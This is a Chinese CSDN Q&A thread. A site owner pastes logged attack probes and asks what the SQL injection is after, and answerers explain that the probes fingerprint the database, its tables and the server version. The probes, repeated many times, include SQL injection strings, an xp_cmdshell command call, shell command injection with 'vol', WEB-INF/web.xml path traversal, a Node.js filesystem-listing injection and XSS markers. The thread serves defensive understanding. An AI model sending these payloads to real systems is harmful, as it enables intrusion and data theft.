MySQL数据库大神进来看看,这一类SQL注入攻击的目的是什么,要获取我什么东西
 "'
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('.').toString())
"Aryprobehb0004C6
Aryprobehb0004C6
ryprobehb0004C6
ryprobehb0004C6
\WEB-INF\web.xml
//….//WEB-INF/web.xml
\..\WEB-INF\web.xml
/../WEB-INF/web.xml
(select )
/WEB-INF/web.xml
 + ltrim('') + '
AVAK$(RETURN_CODE)OS
 || '' || '
;vol
||vol
 exec master..xp_cmdshell 'ver'-- 
%' and 'f%'='f
 and 'f'='f') -- 
" | "vol
 | 'vol
&&vol
 and 'f'='f
 and 'f'='f' -- 
|vol
)
\"
;
"


\'
#&<(,+">;
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
\' having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
; select @@version,1,1,1--
 having 1=1--
"

�' having 1=1-- 

) having 1=1-- 
\' having 1=1-- 
";SELECT 1;
1 having 1=1-- 
; select @@version,1,1,1-- 
;
 having 1=1-- 
; select * from sys.dba_users-- 
; select * from dbo.sysdatabases-- 
; select * from master..sysmessages-- 
ProbePhishing
WFXSSProbe
AB
"
WF'SQL"Probe;A--B
WFXSSProbe'")/>
\WEB-INF\web.xml
"Aryprobehb0004B5
\..\WEB-INF\web.xml
res.end(require('fs').readdirSync('.').toString())
/../WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\"
"
res.end(require('fs').readdirSync('.').toString())
)
\..\WEB-INF\web.xml
 | 'vol
Aryprobehb0004B5
||vol
(select )
ryprobehb0004B5
;vol
AVAK$(RETURN_CODE)OS
"'
\"
 || '' || '
"'
ryprobehb0004B5
" | "vol
;vol
//….//WEB-INF/web.xml
/WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\WEB-INF\web.xml
" | "vol
;
 + ltrim('') + '
)

\'
 + ltrim('') + '
 and 'f'='f') -- 
"
|vol
&&vol
/WEB-INF/web.xml

(select )
;
 | 'vol
%' and 'f%'='f
 exec master..xp_cmdshell 'ver'-- 

&&vol
%' and 'f%'='f
 and 'f'='f' -- 
#&<(,+">;
||vol
|vol
 and 'f'='f
#&<(,+">;
 exec master..xp_cmdshell 'ver'-- 
AVAK$(RETURN_CODE)OS
 and 'f'='f') -- 

//….//WEB-INF/web.xml
\'
/../WEB-INF/web.xml
 || '' || '
 and 'f'='f
 and 'f'='f' -- 
; select * from sys.dba_users--
\' having 1=1--
�' having 1=1--
) having 1=1--
1 having 1=1--
\' having 1=1--
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
; select @@version,1,1,1--
; select @@version,1,1,1--
 having 1=1--
 having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
�' having 1=1-- 
"

"



�' having 1=1-- 
1 having 1=1-- 
";SELECT 1;
";SELECT 1;
) having 1=1-- 
) having 1=1-- 
\' having 1=1-- 
1 having 1=1-- 
\' having 1=1-- 
 having 1=1-- 
;
; select * from master..sysmessages-- 
; select @@version,1,1,1-- 
; select * from master..sysmessages-- 
 having 1=1-- 
;
; select @@version,1,1,1-- 
WFXSSProbe
; select * from dbo.sysdatabases-- 
; select * from sys.dba_users-- 
; select * from sys.dba_users-- 
; select * from dbo.sysdatabases-- 
WFXSSProbe
WF'SQL"Probe;A--B
ProbePhishing
"
"
WF'SQL"Probe;A--B
ProbePhishing
WFXSSProbe'")/>
AB
AB
WFXSSProbe'")/>

3个回答

这里有很多试探,比如说试探你的数据库的表结构select * from sys.dba_users--,试探你的服务器的软件环境select @@version,1,1,1--
试探你的程序是不是js拼接的sql(比如nodejs) + ltrim('') + '
还有一些可能是针对某个特定web系统的漏洞,等等。

loda7023link
loda7023link 幸好我做的不是拼接字符数,而是参数化
2 年多之前 回复

黑客想要获取你的用户名和密码

邮箱地址吧。这种攻击的话

Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
立即提问